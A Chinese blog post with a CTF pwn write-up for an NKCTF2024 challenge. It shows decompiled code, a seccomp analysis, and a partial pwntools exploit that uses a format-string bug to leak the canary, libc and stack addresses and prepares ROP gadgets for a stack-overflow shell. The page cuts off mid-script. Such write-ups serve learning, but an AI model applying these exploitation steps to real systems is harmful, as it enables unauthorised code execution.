<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Wgiegie-NKctf2024 第一题 | 纲的blog</title>

  <!-- keywords -->
  
    <meta name="keywords" content="Wgiegie">
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="这是一道之前在有个周末的比赛中的题，比赛是NKCTF2024，网站已经没有了，算是一个战队的招新比赛吧，不过算是一道比较简单的题，主要的漏洞就是格式化字符串漏洞和一个栈溢出，相较于之前那些动不动就上堆的题目好了不止一点，虽然在最后的时候还会有一个特别坑的地方，不够这就已经是后话了，等到的时候再慢慢说。 老规矩，先checksec一下程序，保护全开，有点难整，不过还是丢到ida里面去看看怎么样，">
<meta property="og:type" content="article">
<meta property="og:title" content="NKctf2024 第一题">
<meta property="og:url" content="https://2023478.github.io/2024/03/28/hxctf/index.html">
<meta property="og:site_name" content="纲的blog">
<meta property="og:description" content="这是一道之前在有个周末的比赛中的题，比赛是NKCTF2024，网站已经没有了，算是一个战队的招新比赛吧，不过算是一道比较简单的题，主要的漏洞就是格式化字符串漏洞和一个栈溢出，相较于之前那些动不动就上堆的题目好了不止一点，虽然在最后的时候还会有一个特别坑的地方，不够这就已经是后话了，等到的时候再慢慢说。 老规矩，先checksec一下程序，保护全开，有点难整，不过还是丢到ida里面去看看怎么样，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328153030882.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328153438575.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328153959045.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328155823265.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328154528444.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328162015627.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328162412607.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328162449070.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328185516369.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328205758246.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240325200803566.png">
<meta property="og:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328214024472.png">
<meta property="article:published_time" content="2024-03-28T07:08:34.000Z">
<meta property="article:modified_time" content="2024-03-30T02:55:07.410Z">
<meta property="article:author" content="wgiegie">
<meta property="article:tag" content="pwn题解">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://2023478.github.io/2024/03/28/hxctf/image-20240328153030882.png">
  
    <link rel="alternative" href="/atom.xml" title="纲的blog" type="application/atom+xml">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 7.1.1"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/C%E8%AF%AD%E8%A8%80/" style="font-size: 10px;">C语言</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/pwn/" style="font-size: 20px;">pwn</a> <a href="/tags/pwn%E5%A7%BF%E5%8A%BF/" style="font-size: 10px;">pwn姿势</a> <a href="/tags/pwn%E5%B7%A5%E5%85%B7/" style="font-size: 15px;">pwn工具</a> <a href="/tags/pwn%E9%A2%98%E8%A7%A3/" style="font-size: 15px;">pwn题解</a> <a href="/tags/%E5%91%A8%E6%8A%A5/" style="font-size: 10px;">周报</a> <a href="/tags/%E5%A0%86/" style="font-size: 20px;">堆</a> <a href="/tags/%E6%90%AD%E5%8D%9A%E5%AE%A2/" style="font-size: 10px;">搭博客</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-hxctf" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2024/03/28/hxctf/" class="article-date">
  	<time datetime="2024-03-28T07:08:34.000Z" itemprop="datePublished">2024-03-28</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      NKctf2024 第一题
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn%E9%A2%98%E8%A7%A3/" rel="tag">pwn题解</a></li></ul>
	</div>

        
	<div class="article-category tagcloud">
	<a class="article-category-link" href="/categories/CTF/">CTF</a>
	</div>


        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>  这是一道之前在有个周末的比赛中的题，比赛是NKCTF2024，网站已经没有了，算是一个战队的招新比赛吧，不过算是一道比较简单的题，主要的漏洞就是格式化字符串漏洞和一个栈溢出，相较于之前那些动不动就上堆的题目好了不止一点，虽然在最后的时候还会有一个特别坑的地方，不够这就已经是后话了，等到的时候再慢慢说。</p>
<p>老规矩，先checksec一下程序，保护全开，有点难整，不过还是丢到ida里面去看看怎么样，</p>
<p><img src="/2024/03/28/hxctf/image-20240328153030882.png" alt="image-20240328153030882"></p>
<p>这是在ida里面的主函数的样子</p>
<p><img src="/2024/03/28/hxctf/image-20240328153438575.png" alt="image-20240328153438575"></p>
<p>有canary保护，主要程序一上来就是一个无限循环的函数，便开始跟随程序的过程一步一步来，先看sub_1289()这第一个函数，感觉像解决缓冲区的函数，</p>
<p><img src="/2024/03/28/hxctf/image-20240328153959045.png" alt="image-20240328153959045"></p>
<p>果然是一个用于解决缓冲区的函数，不过问题是在代码的最后几行使用了，seccomp函数，这个函数一般是用来开起沙箱保护，关于具体使用沙箱禁止了哪些函数可以用工具直接查看，关于工具的使用如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">seccomp-tools dump ./文件名</span><br></pre></td></tr></table></figure>

<p>关于这个工具，如果一个程序开启了沙箱，这会出现类似如下的情况，如果没开则会直接进入程序的执行过程</p>
<p>这道题的沙箱结果如下，</p>
<p>当时我第一次分析的时候，不理解这个沙箱的含义，误以为这个题是只能进行open函数的系统调用，导致做了一个下午的无用过，这里便将这个工具的大概讲一讲避免下次还出现这样的傻13问题</p>
<img src="/2024/03/28/hxctf/image-20240328155823265.png" alt="image-20240328155823265" style="zoom: 25%;">

<img src="/2024/03/28/hxctf/image-20240328154528444.png" alt="image-20240328154528444" style="zoom: 200%;">



<p>关于这个工具的具体是嘛，我已不太懂，不过现在大概明白该怎么看这个工具的使用，像这道题中就有A&#x3D;&#x3D;open就跳转0007，而0007的内容便是kill像这种便是将open函数紧用，而其他的函数都是可以用的。如果还有其他函数后面跟的数字在前面的表中的最后是kill这这个函数便是禁用的，其他的函数便是可以用的，像这题便是可以通过system等系统调用从而进行拿到远程服务器的shell，但同时禁用的open便不再能使用orw的办法将远程的flag直接读到屏幕上。</p>
<p>现在便在次回到一开始的main函数中，开始执行，会要我们输入点东西，只是这个有限制，只能输入1和2并且输入2还没有什么用，暂时会回到程序一开始输入的地方，我们便只能输入1，进入到sub_188c()这个函数中，</p>
<p><img src="/2024/03/28/hxctf/image-20240328162015627.png" alt="image-20240328162015627"></p>
<p>很明显这个函数中没有什么可以用的地方，但是当我们回到main函数中，找到sub_19EA()函数并进入其中，会发现直接出现了一个格式化漏洞，如下，</p>
<p><img src="/2024/03/28/hxctf/image-20240328162412607.png" alt="image-20240328162412607"></p>
<p>很明显关这一个格式化漏洞变可以将canary和pie保护都给绕过，还可以将程序的libc_base地址暴露出来，配合同题目一起下载的libc版本，大部分栈的问题基本就解决了，虽然在这里能read的数据才只有8字节，能暴露的数据好像挺少的，但别忘了在main函数中这是一个巨大的无限循环函数，只要在执行完这个函数后再回到之前的地方，然后在执行会来便可以有多暴露几个地址。同时查看这个函数中的sub_1984()函数会发现，又有新的漏洞。</p>
<p>在这里我们想要进入sub_1984()函数之前还会有一个判断，当dword_504c &lt; dword_5010会直接进入exit中从而结束进程，因此我们要保证dword_504c &gt; dword_5010从而顺利进入sub_1984()函数，而这两个数dword_5010的大小为11682，而dword_504c则和之前的一个函数中的过程有关系，到之后在讲，反正要保证在执行这个函数之前dword_504c的值一定要大于11682。</p>
<p><img src="/2024/03/28/hxctf/image-20240328162449070.png" alt="image-20240328162449070"></p>
<p>在这里有一个致命的漏洞，便是栈溢出，可以读0x80的数据但buf只能放0x30的数据，在结合之前的格式化字符串漏洞，将canary绕过，然后执行system（&#x2F;bin&#x2F;sh）便可以直接拿到shell。</p>
<p>那现在便要回到main函数中，看怎么才能到sub_19EA()中，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall __noreturn <span class="title function_">main</span><span class="params">(<span class="type">int</span> a1, <span class="type">char</span> **a2, <span class="type">char</span> **a3)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v3; <span class="comment">// [rsp+0h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  sub_1289();</span><br><span class="line">  v4 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      sub_134F();</span><br><span class="line">      __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v3);</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">1</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      sub_188C();</span><br><span class="line">      v4 = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v3 == <span class="number">2</span> &amp;&amp; v4 )</span><br><span class="line">    &#123;</span><br><span class="line">      sub_19EA();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">2</span> || v4 )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Invalid option.&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;Calculate your rating first.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>在这里可以很明显看出来，要进入到其中必须保证输入的v3&#x3D;&#x3D;2&amp;&amp;v4，而如果一开始就输入2那v4的值为0，将不会成立，因此要先执行v3&#x3D;&#x3D;1是的所有函数并成功退出来，使v4&#x3D;&#x3D;1，然后将v3输入2，才能进入其中，</p>
<p>于我们便进入sub_188C()函数中去寻找如何能过顺利通过这个函数，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">sub_188C</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">double</span> v0; <span class="comment">// xmm0_8</span></span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// eax</span></span><br><span class="line">  <span class="type">int</span> v3; <span class="comment">// [rsp+8h] [rbp-28h]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+Ch] [rbp-24h]</span></span><br><span class="line">  <span class="type">double</span> v5; <span class="comment">// [rsp+10h] [rbp-20h] BYREF</span></span><br><span class="line">  <span class="type">double</span> v6; <span class="comment">// [rsp+18h] [rbp-18h]</span></span><br><span class="line">  <span class="type">char</span> v7[<span class="number">5</span>]; <span class="comment">// [rsp+23h] [rbp-Dh] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v8; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v8 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v6 = <span class="number">0.0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Input chart level and rank.&quot;</span>);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">49</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%lf %s&quot;</span>, &amp;v5, v7);</span><br><span class="line">    v0 = v5;</span><br><span class="line">    <span class="keyword">if</span> ( v5 == <span class="number">15.0</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      v1 = v3++;</span><br><span class="line">      <span class="keyword">if</span> ( v1 == <span class="number">2</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Invalid.&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> v8 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    sub_1633(v7);</span><br><span class="line">    v6 = v0 * v5 + v6;</span><br><span class="line">  &#125;</span><br><span class="line">  dword_504C = (<span class="type">int</span>)v6;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Calculation Done.&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> v8 - __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>在第一次看这里的时候会发现是个有50次循环的函数，每一次都需要输入一个双精度浮点数（小数，121.22）和字符，然后好像只要输入的双精度浮点数是15.0，便可以满足第一个判断条件，使v1&#x3D;&#x3D;v3++，由于输入时的v3为1那此时v1变等于2，满足条件，进入函数中，然后返回去。</p>
<p>这个如果是像上面想的一样就好了，但在运行时会发现并不是这样的，他依然会再次循环，重新输入两个数，因此不在想通过满足条件的方法返回，干脆直接写一个函数运行50次。进行50次的输入，从而完成循环，返回main函数。</p>
<p>在这里有一个函数是关于我们输入的字符v7的，如下</p>
<p><img src="/2024/03/28/hxctf/image-20240328185516369.png" alt="image-20240328185516369"></p>
<p>这段代码看起来是一个简单的映射函数，根据输入的不同字符串返回不同的64位整数值。我们在运行时喂了满足要求，便可以将之前那个循环中的要输入的字符串，定为这里面的随机一个（C，D，A，B任选一个便可以）。</p>
<p>再往下面看会有两行有趣的代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">v6 = v0 * v5 + v6;</span><br><span class="line">dword_504C = (<span class="type">int</span>)v6;</span><br></pre></td></tr></table></figure>

<p>在前面的代码可以知道，v5是我们输入的数，v0&#x3D;&#x3D;v5，在执行这里前v6&#x3D;0，因此dword_504C值等于我们再循环中输入的最后一次的数的平方，然后在后面我们为了要进入那个漏洞函数必须要保证dword_504c的值一定要大于11682，因此我们写入得数可以考虑大一点，方便后面直接进入栈溢出函数，</p>
<p>于此便可以写出能进入sub_19EA()函数的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    p.sendline(<span class="string">&#x27;111.0 SSS+&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>自此便能顺利进入sub_19EA()函数中，进行地址的泄露，和栈溢出，这里边不在多讲，比较简单，只要注意的在与，当到栈溢出时候，只要不溢出，便又会回到main函数，并且这里由于之前已经将1中的过程过了便可以不在过1，直接进行2进入到格式化漏洞出。</p>
<p>具体的看exp便可以，然后在exp中由于在一开始写的时候将沙箱的内容看错，因此有的写的多了，在真正用的并不是全部的，有的可以删去，并没有删（太懒了不想动了），并且有的地方可以写成函数已没有，因此重复的地方有点多（python有点差了·，找时间补一下）具体的自己看吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&quot;./pwn1&quot;</span>)</span><br><span class="line"><span class="comment">#p = remote(&quot;node.nkctf.yuzhian.com.cn&quot;, 38793 )</span></span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span> ,arch = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p,&#x27;b $rebase(0x19e8)&#x27;)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"><span class="comment">#在这题中由于开启了PIE保护，故要下断点必须加上$rebase()</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    p.sendline(<span class="string">&#x27;111.0 SSS+&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"><span class="comment">#以上是进入漏洞函数</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%11$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">canary =<span class="built_in">int</span>(p.recv(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;canary: &#x27;</span>,<span class="built_in">hex</span>(canary))</span><br><span class="line"><span class="comment">#将canary的值暴露出来，方便栈溢出</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"><span class="comment">#为了回到main函数中，随便读入数据进去</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%33$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">libc_start_main_128=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc_start_main_128: &#x27;</span>,<span class="built_in">hex</span>(libc_start_main_128))</span><br><span class="line">libc_start_main=libc_start_main_128-<span class="number">128</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc_start_main: &#x27;</span>,<span class="built_in">hex</span>(libc_start_main))</span><br><span class="line"><span class="comment">#将libc_base的值暴露出来，先随便暴露一个函数的got表地址</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#elo=ELF(&#x27;/usr/lib/x86_64-linux-gnu/libc.so.6&#x27;)</span></span><br><span class="line">elo=ELF(<span class="string">&#x27;libc.so.6&#x27;</span>)</span><br><span class="line">libc_start_main_libc=elo.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;__libc_start_main_libc&#x27;</span>,<span class="built_in">hex</span>(libc_start_main_libc))</span><br><span class="line">open_libc=elo.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;open_libc&#x27;</span>,<span class="built_in">hex</span>(open_libc))</span><br><span class="line">setuid_libc=elo.symbols[<span class="string">&#x27;setuid&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#通过链接libc库从而找到暴露的函数的偏移量，以及需要的函数的偏移量</span></span><br><span class="line"></span><br><span class="line">pop_rdi_ret_libc=<span class="number">0x2a3e5</span></span><br><span class="line">pop_rsi_ret_libc=<span class="number">0x2be51</span></span><br><span class="line">pop_rbp_ret_libc=<span class="number">0x2a2e0</span></span><br><span class="line">pop_rdx_pop_r12_ret_libc=<span class="number">0x11f2e7</span></span><br><span class="line"><span class="comment">#在库中找到的pop指令，便于payload的使用</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">base_libc=libc_start_main-libc_start_main_libc</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;base_libc&#x27;</span>,<span class="built_in">hex</span>(base_libc))</span><br><span class="line"><span class="built_in">open</span> = open_libc+base_libc</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;open: &#x27;</span>,<span class="built_in">hex</span>(<span class="built_in">open</span>))</span><br><span class="line"></span><br><span class="line">pop_rdi_ret=pop_rdi_ret_libc+base_libc</span><br><span class="line">pop_rsi_ret=pop_rsi_ret_libc+base_libc</span><br><span class="line">pop_rbp_ret=pop_rbp_ret_libc+base_libc</span><br><span class="line">pop_rdx_pop_r12_ret=pop_rdx_pop_r12_ret_libc+base_libc</span><br><span class="line"><span class="comment">#确定真实地址</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;maimai?\n&#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Select a option:\n&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;nickname.\n&#x27;</span>,<span class="string">b&#x27;%8$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">zhan=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;zhen: &#x27;</span>,<span class="built_in">hex</span>(zhan))</span><br><span class="line">flag=zhan-<span class="number">0x70</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;flag: &#x27;</span>,<span class="built_in">hex</span>(flag))</span><br><span class="line"><span 